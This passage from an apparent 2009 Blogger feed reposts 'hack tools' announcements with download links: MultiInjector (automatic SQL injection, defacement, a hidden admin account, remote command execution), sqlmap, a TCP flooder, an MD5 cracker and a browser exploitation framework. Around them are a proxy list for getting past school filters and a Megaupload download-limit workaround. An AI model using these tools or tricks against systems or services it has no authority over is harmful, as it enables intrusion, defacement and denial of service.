/&gt;http://www.schoolsiteunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.schoolspaceunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.sellchat.com (US, PHProxy 0.5)&lt;br /&gt;http://www.sethpowell.info (US, PHProxy 0.5)&lt;br /&gt;http://www.sitetounblockwebsite.info (US, PHProxy 0.5)&lt;br /&gt;http://www.skystuff.info (US, PHProxy 0.5)&lt;br /&gt;http://www.smartglide.info (US, PHProxy 0.5)&lt;br /&gt;http://www.smartunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.spaceunblock.info (US, PHProxy 0.5)&lt;br /&gt;http://www.sunmagic.info (US, PHProxy 0.5)&lt;br /&gt;http://www.supermanproxy.com (US, Glype)&lt;br /&gt;http://www.surfco.info (US, PHProxy 0.5)&lt;br /&gt;http://www.surfconnect.info (US, PHProxy 0.5)&lt;br /&gt;http://www.surfgames.info (US, PHProxy 0.5)&lt;br /&gt;http://www.surfgo.info (US, PHProxy 0.5)&lt;br /&gt;http://www.surfhelp.info (US, PHProxy 0.5)&lt;br /&gt;http://www.surflist.info (US, PHProxy 0.5)&lt;br /&gt;http://www.surfmap.info (US, PHProxy 0.5)&lt;br /&gt;http://www.surfnetwork.info (US, PHProxy 0.5)&lt;br /&gt;http://www.surfsearch.info (US, PHProxy 0.5)&lt;br /&gt;from mmitpros&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-1450613320665561479?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/1450613320665561479/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/list-of-fully-working-proxies.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1450613320665561479'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1450613320665561479'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/list-of-fully-working-proxies.html' title='A list of fully working proxies,'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-84476954254955064</id><published>2009-01-03T03:13:00.000-08:00</published><updated>2009-01-03T04:18:57.837-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='upload download'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><title type='text'>Megaupload unlimited downloads</title><content type='html'>Megaupload unlimited downloads&lt;br /&gt;&lt;br /&gt;Posted on 08. Aug, 2008 by raymond in Computer, Tips and Trick&lt;br /&gt;&lt;br /&gt;Many people sometime have a problems when download from Megaupload.com. Here some solution that you can try to get unlimited download from megaupload like premium user.&lt;br /&gt;&lt;br /&gt;Here are the steps:&lt;br /&gt;&lt;br /&gt;1 ) If you already download Megaupload toolbar and installed on your computer, uninstall it first as it contains a spyware&lt;br /&gt;&lt;br /&gt;2 ) Download Mozilla Firefox browser&lt;br /&gt;&lt;br /&gt;3 ) After Install firefox, get firefox user agent switcher extension from here.&lt;br /&gt;&lt;br /&gt;4 ) After add this addon, go to:&lt;br /&gt;&lt;br /&gt;    menu —&gt; Tool —&gt; user agent swither —&gt; option —&gt; add&lt;br /&gt;&lt;br /&gt;5 ) Follow this to fill up the form there:&lt;br /&gt;&lt;br /&gt;    Description : MEGAUPLOAD&lt;br /&gt;    User agent : Mozilla/4.0 ( compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar )&lt;br /&gt;&lt;br /&gt;Finish and before download from megaupload go to&lt;br /&gt;&lt;br /&gt;    tool —&gt; user agent —&gt; megaupload&lt;br /&gt;&lt;br /&gt;and then you should be able to download from megaupload&lt;br /&gt;from bloggeraz&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-84476954254955064?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/84476954254955064/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/megaupload-unlimited-downloads.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/84476954254955064'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/84476954254955064'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/megaupload-unlimited-downloads.html' title='Megaupload unlimited downloads'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-2539338714929647586</id><published>2009-01-03T03:04:00.001-08:00</published><updated>2009-01-03T20:57:19.514-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='upload download'/><category scheme='http://www.blogger.com/atom/ns#' term='rapidshare'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><title type='text'>How to detect rapidshare happyhour</title><content type='html'>Rapidshare now comes back again with its Happy Hour. Lucky me, I had a chance to enjoy it yesterday. For those who are not familiar with this feature, it's actually a limited time frame provided by Rapidshare where free users don't have to input the "cats" CAPTCHAs and enjoy the same privilege as premium users (free unlimited download). Since this Happy Hour doesn't take place on regular basis (only opened when there's luxury of bandwidth), I'm sure our chance of finding Happy Hour is pretty slim.&lt;br /&gt;&lt;br /&gt;Haris over at &lt;a href="http://www.sizzledcore.com/2008/05/02/rapidshare-happy-hours-detector/"&gt;SIzzleCore&lt;/a&gt; has a nice share on how to get around this problem. &lt;a href="http://rapidshare.com/files/111920917/HappyCat.msi"&gt;Happy Cat&lt;/a&gt;, named after new feature in Rapidshare's CAPTCHA system, is a useful tool in detecting Happy Hour time. This little application will be running in the taskbar and will buzz you to let you know about Happy Hour time. So this application will ensure you to make full use of Rapidshare's generosity.&lt;br /&gt;&lt;br /&gt;In order to make this little application fully functional you need to install &lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=333325FD-AE52-4E35-B531-508D977D32A6&amp;displaylang=en"&gt;Microsoft .NET Framework 3.5&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Mirror links:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/111924128/HappyCat.msi"&gt;Mirror 1&lt;/a&gt; | &lt;a href="http://rapidshare.com/files/111924268/HappyCat.msi"&gt;Mirror 2&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[via: Sizlopedia.com]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-2539338714929647586?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/2539338714929647586/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-detect-rapidshare-happyhour.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2539338714929647586'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2539338714929647586'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-detect-rapidshare-happyhour.html' title='How to detect rapidshare happyhour'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-3979678553951191266</id><published>2009-01-03T02:57:00.000-08:00</published><updated>2009-01-03T05:10:17.965-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='SQL'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>MultiInjector v0.3 Released - Automatic SQL Injection and Defacement Tool</title><content type='html'>MultiInjector v0.3 Released - Automatic SQL Injection and Defacement Tool&lt;br /&gt;&lt;br /&gt;You might remember a while ago we posted about MultiInjector which claims to the first configurable automatic website defacement tool, it got quite a bit of interest and shortly after that it was updated. Anyway, good or bad I think people deserve to know what is out there.&lt;br /&gt;&lt;br /&gt;Features&lt;br /&gt;&lt;br /&gt;    * Receives a list of URLs as input&lt;br /&gt;    * Recognizes the parameterized URLs from the list&lt;br /&gt;    * Fuzzes all URL parameters to concatenate the desired payload once an injection is successful&lt;br /&gt;    * Automatic defacement - you decide on the defacement content, be it a hidden script, or just pure old “cyber graffiti” fun&lt;br /&gt;    * OS command execution - remote enabling of XP_CMDSHELL on SQL server, subsequently running any arbitrary operating system command lines entered by the user&lt;br /&gt;    * Configurable parallel connections exponentially speed up the attack process - one payload, multiple targets, simultaneous attacks&lt;br /&gt;    * Optional use of an HTTP proxy to mask the origin of the attacks&lt;br /&gt;&lt;br /&gt;Changes&lt;br /&gt;&lt;br /&gt;    * Automatic defacement - Try to concatenate a string to all user-defined text fields in DB&lt;br /&gt;    * Run any OS command as if you’re running a command console on the DB machine&lt;br /&gt;    * Execute SQL commands of your choice&lt;br /&gt;    * Enable OS shell procedure on DB - Revive the good old XP_CMDSHELL where it was turned off&lt;br /&gt;    * Add administrative user to DB server with password: T0pSeKret&lt;br /&gt;    * Enable remote desktop on DB server&lt;br /&gt;    * Fixed nvarchar cast to varchar. Verified against MS-SQL 2000&lt;br /&gt;    * Added numeric / string parameter type detection&lt;br /&gt;    * Improved defacement content handling by escaping quotation marks&lt;br /&gt;    * Improved support for Linux systems&lt;br /&gt;    * Fixed the “invalid number of concurrent connections” failure due to non-parameterized URLs&lt;br /&gt;&lt;br /&gt;You can download MultiInjector v0.3 here&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.sn3akers.com/downloads/MultiInjectorV0.3.tar.gz"&gt;MultiInjectorV0.3.tar.gz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://chaptersinwebsecurity.blogspot.com/2008/11/multiinjector-v03-released.html"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-3979678553951191266?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/3979678553951191266/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/multiinjector-v03-released-automatic.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/3979678553951191266'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/3979678553951191266'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/multiinjector-v03-released-automatic.html' title='MultiInjector v0.3 Released - Automatic SQL Injection and Defacement Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-4008981440126895808</id><published>2009-01-03T02:56:00.001-08:00</published><updated>2009-01-03T05:12:04.510-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='SQL'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>sqlmap 0.6.3 Released - Automatic SQL Injection Tool</title><content type='html'>sqlmap 0.6.3 Released - Automatic SQL Injection Tool&lt;br /&gt;&lt;br /&gt;sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more..&lt;br /&gt;&lt;br /&gt;Changes&lt;br /&gt;&lt;br /&gt;Some of the new features include:&lt;br /&gt;&lt;br /&gt;    * Major enhancement to get list of targets to test from Burp proxy requests log file path or WebScarab proxy ‘conversations/’ folder path with option -l;&lt;br /&gt;    * Major enhancement to support Partial UNION query SQL injection technique;&lt;br /&gt;    * Major enhancement to test if the web application technology sup ports stacked queries (multiple statements) by providing option –stacked-test which will be then used someday also by takeover functionality;&lt;br /&gt;    * Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option –time-test;&lt;br /&gt;    * Major bug fix to correctly enumerate columns on Microsoft SQL Server;&lt;br /&gt;    * Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM&lt;br /&gt;      there is no database name specified;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sqlmap.sourceforge.net/doc/ChangeLog"&gt;Complete ChangeLog&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;You can download sqlmap 0.6.3 here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3.tar.gz"&gt;sqlmap-0.6.3.tar.gz&lt;/a&gt; (Linux)&lt;br /&gt;&lt;a href="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3_exe.zip"&gt;sqlmap-0.6.3_exe.zip&lt;/a&gt; (Windows)&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://sqlmap.sourceforge.net/"&gt;here&lt;/a&gt; (&lt;a href="http://sqlmap.sourceforge.net/doc/README.pdf"&gt;User Manual&lt;/a&gt;).&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-4008981440126895808?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/4008981440126895808/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/sqlmap-063-released-automatic-sql.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4008981440126895808'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4008981440126895808'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/sqlmap-063-released-automatic-sql.html' title='sqlmap 0.6.3 Released - Automatic SQL Injection Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-6107306620782319812</id><published>2009-01-03T02:55:00.000-08:00</published><updated>2009-01-03T05:13:08.678-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TCP flooder'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>Complemento v0.4b - LetDown TCP Flooder, ReverseRaider Subdomain Scanner &amp; Httsquash HTTP Server Scanner Tool</title><content type='html'>Complemento v0.4b - LetDown TCP Flooder, ReverseRaider Subdomain Scanner &amp; Httsquash HTTP Server Scanner Tool&lt;br /&gt;&lt;br /&gt;An interesting collection of tools for pen-testing including a DoS tool (something you don’t often see publicly released).&lt;br /&gt;&lt;br /&gt;Complemento is a collection of tools that the author originally created for his own personal toolchain for solving some problems or just for fun. Now he has decided to release it to the public.&lt;br /&gt;&lt;br /&gt;The Tools&lt;br /&gt;&lt;br /&gt;LetDown is a TCP flooder written after the author read the article by fyodor entitled article “&lt;a href="http://insecure.org/stf/tcp-dos-attack-explained.html"&gt;TCP Resource Exhaustion and Botched Disclosure“.&lt;/a&gt;&lt;br /&gt;ReverseRaider is a domain scanner that uses brute force wordlist scanning for finding a target sub-domains or reverse resolution for a range of ip addresses. This is similar to some of the functionality in DNSenum.&lt;br /&gt;&lt;br /&gt;Httsquash is an HTTP server scanner, banner grabber and data retriever. It can be used for scanning large ranges of IP addresses and finding devices or HTTP servers (there is an alpha version of a GUI for this).&lt;br /&gt;&lt;br /&gt;You can download Complemento v0.4b here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sourceforge.net/project/showfiles.php?group_id=247056&amp;package_id=301500&amp;release_id=645740"&gt;complemento-0.4b&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://complemento.sourceforge.net/"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-6107306620782319812?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/6107306620782319812/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/complemento-v04b-letdown-tcp-flooder.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6107306620782319812'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6107306620782319812'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/complemento-v04b-letdown-tcp-flooder.html' title='Complemento v0.4b - LetDown TCP Flooder, ReverseRaider Subdomain Scanner &amp; Httsquash HTTP Server Scanner Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-6046182745540002679</id><published>2009-01-03T02:51:00.000-08:00</published><updated>2009-01-03T05:15:00.827-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><category scheme='http://www.blogger.com/atom/ns#' term='password cracking'/><title type='text'>The World’s Fastest MD5 Cracker - BarsWF</title><content type='html'>The World’s Fastest MD5 Cracker - BarsWF&lt;br /&gt;&lt;br /&gt;BarsWF is basically an MD5 cracking tool and at the moment, is currently the fastest. Right now on nVidia 9600GT/C2D 3Ghz CUDA version does 350 M keys/sec, SSE2 version does 108 M keys/sec. You may check benchmarks of all known good MD5 bruteforcers &lt;a href="http://3.14.by/en/read/md5_benchmark"&gt;here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Changes in 0.8&lt;br /&gt;&lt;br /&gt;    * Added checks for errors when calling CUDA kernel.&lt;br /&gt;    * Now you can specify custom characters for charset using -X switch.&lt;br /&gt;    * You may specify minimal password length using -min_len.&lt;br /&gt;    * Save/restore feature added. State is being stored to barswf.save every 5 minutes or on exit. You may continue computation using -r switch. You may manually edit .save file to distribute job on several computers (but this is up to you - it is quite simple and non-documented ). BarsWF will also write found password into barswf.save at the end.&lt;br /&gt;    * Improved speed for cards GTX260, GTX280, 8800GT, 9600GSO, 8800GS, 8800GTS - by approximately 10%, all other cards will get just 1-2%.&lt;br /&gt;&lt;br /&gt;System Requirements&lt;br /&gt;&lt;br /&gt;    * CUDA version only:nVidia GeForce 8xxx and up, at least 256mb of video memory.&lt;br /&gt;    * LATEST nVidia-driver with CUDA support.Standard drivers might be a bit older (as CUDA 2.0 is still beta)&lt;br /&gt;    * CPU with SSE2 support (P4, Core2Duo, Athlon64, Sempron64, Phenom).&lt;br /&gt;    * Recommended 64-bit OS (WinXP 64 or Vista64). 32-bit version is also available.&lt;br /&gt;&lt;br /&gt;Download BarsWF 0.8 here:&lt;br /&gt;&lt;br /&gt;CUDA:&lt;br /&gt;&lt;a href="http://3.14.by/files/BarsWF_CUDA_x64.zip"&gt;BarsWF CUDA x64&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3.14.by/files/BarsWF_CUDA_x32.zip"&gt;BarsWF CUDA x32&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;SSE2:&lt;br /&gt;&lt;a href="http://3.14.by/files/BarsWF_SSE2_x64.zip"&gt;BarsWF SSE x64&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3.14.by/files/BarsWF_SSE2_x32.zip"&gt;BarsWF SSE x32&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://3.14.by/en/md5"&gt;here. &lt;/a&gt;(Thanks Navin)&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-6046182745540002679?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/6046182745540002679/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/worlds-fastest-md5-cracker-barswf.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6046182745540002679'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6046182745540002679'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/worlds-fastest-md5-cracker-barswf.html' title='The World’s Fastest MD5 Cracker - BarsWF'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-4728306929216145102</id><published>2009-01-03T02:49:00.000-08:00</published><updated>2009-01-03T04:30:30.175-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>FireCAT 1.4 Released - Firefox Catalog of Auditing Extensions</title><content type='html'>FireCAT 1.4 Released - Firefox Catalog of Auditing Extensions&lt;br /&gt;&lt;br /&gt;FireCAT (Firefox Catalog of Auditing exTension) is a mindmap collection of the most efficient and useful firefox extensions oriented application security auditing and assessment&lt;br /&gt;&lt;br /&gt;You can find an online map of Firecat v1.4 &lt;a href="http://firecat.intern0t.net/"&gt;here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Changes for version 1.4&lt;br /&gt;&lt;br /&gt;Information Gathering (Enumeration and Fingerprinting)&lt;br /&gt;&lt;br /&gt;    * Passive Recon : PassiveRecon allows Information Security professionals the ability to perform “packetless” discovery of target resources utilizing publicly available information&lt;br /&gt;&lt;br /&gt;Security Auditing&lt;br /&gt;&lt;br /&gt;    * Selenium IDE : Selenium is a test tool for web applications. Selenium tests run directly in a browser, just like real users do&lt;br /&gt;    * RESTTest : Construct custom HTTP requests to directly test requests against a server. RESTTest uses the XmlHttpRequest object and allows you to simulate XHR to quickly prototype requests and test security problems. Designed specifically for working with REST sources, supporting all HTTP methods&lt;br /&gt;    * Acunetix Firefox plugin: Read here a good review by Kev Orrey. Extension submitted by Kev Orrey from VulnerabilityAssessment&lt;br /&gt;&lt;br /&gt;IT Security Related&lt;br /&gt;&lt;br /&gt;    * Added Milw0rm Exploits Search&lt;br /&gt;&lt;br /&gt;Fixes&lt;br /&gt;&lt;br /&gt;    * Fixed HashMDTool link&lt;br /&gt;    * Fixed OSVB extension link&lt;br /&gt;    * Fixed US Homeland Security Threat link&lt;br /&gt;&lt;br /&gt;You can download FireCAT v1.4 here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.security-database.com/toolswatch/IMG/zip/FireCAT_1.4.mm.zip"&gt;FireCAT 1.4 Source&lt;/a&gt; (Zip - 4.6 kb)&lt;br /&gt;&lt;a href="http://www.security-database.com/toolswatch/IMG/zip/FireCAT1.4_BrowsableHTML.zip"&gt;FireCAT 1.4 Browsable HTML&lt;/a&gt; (Zip - 37.2 kb)&lt;br /&gt;&lt;a href="http://www.security-database.com/toolswatch/IMG/pdf/FireCAT1.4.pdf"&gt;FireCAT 1.4 pdf&lt;/a&gt; (PDF - 186.3 kb)&lt;br /&gt;&lt;br /&gt;You can actually wget all the tools from &lt;a href="http://phrack.fr/blog/index.php?post/2008/11/20/Package-de-plugins-FireCAT-1.4"&gt;here:&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://phrack.fr/tools/FireCAT-1.4"&gt;http://phrack.fr/tools/FireCAT-1.4&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more here.&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-4728306929216145102?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/4728306929216145102/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/firecat-14-released-firefox-catalog-of.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4728306929216145102'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4728306929216145102'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/firecat-14-released-firefox-catalog-of.html' title='FireCAT 1.4 Released - Firefox Catalog of Auditing Extensions'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-5324634733822675835</id><published>2009-01-03T02:47:00.000-08:00</published><updated>2009-01-03T04:31:56.281-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>Browser Rider - Web Browser Exploitation Framework</title><content type='html'>Browser Rider - Web Browser Exploitation Framework&lt;br /&gt;&lt;br /&gt;Browser Rider is a hacking framework to build payloads that exploit the browser. The project aims to provide a powerful, simple and flexible interface to any client side exploit.&lt;br /&gt;&lt;br /&gt;Browser Rider is not a new concept. Similar tools such as BeEF or Backframe exploited the same concept. However most of the other existing tools out there are unmaintained, not updated and not documented. Browser Rider wants to fill those gaps by providing a better alternative.&lt;br /&gt;&lt;br /&gt;Features&lt;br /&gt;&lt;br /&gt;    * Easily create powerful payloads and plugins&lt;br /&gt;    * Manage payloads automatically with plugins&lt;br /&gt;    * All data can be saved in a database&lt;br /&gt;    * Obfuscation&lt;br /&gt;    * Polymorphism&lt;br /&gt;    * Control more than one zombie at a time&lt;br /&gt;    * Simple administration panel&lt;br /&gt;&lt;br /&gt;Requirements&lt;br /&gt;&lt;br /&gt;    * PHP 5, with json installed&lt;br /&gt;    * Mysql&lt;br /&gt;    * Apache with url_rewrite on&lt;br /&gt;    * Targets must have Javascript turned on&lt;br /&gt;&lt;br /&gt;You can download Browser Rider here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.engineeringforfun.com/cave/browserrider/BrowserRider.20081124.tar.bz2"&gt;Browser Rider v20081124&lt;/a&gt; (&lt;a href="http://www.engineeringforfun.com/wiki/index.php/Browser_Rider_Changelog#Browser_Rider_v20081124"&gt;changelog&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://engineeringforfun.com/browserrider.html"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-5324634733822675835?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/5324634733822675835/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/browser-rider-web-browser-exploitation.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5324634733822675835'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5324634733822675835'/><link rel='alternate' type='text/html' 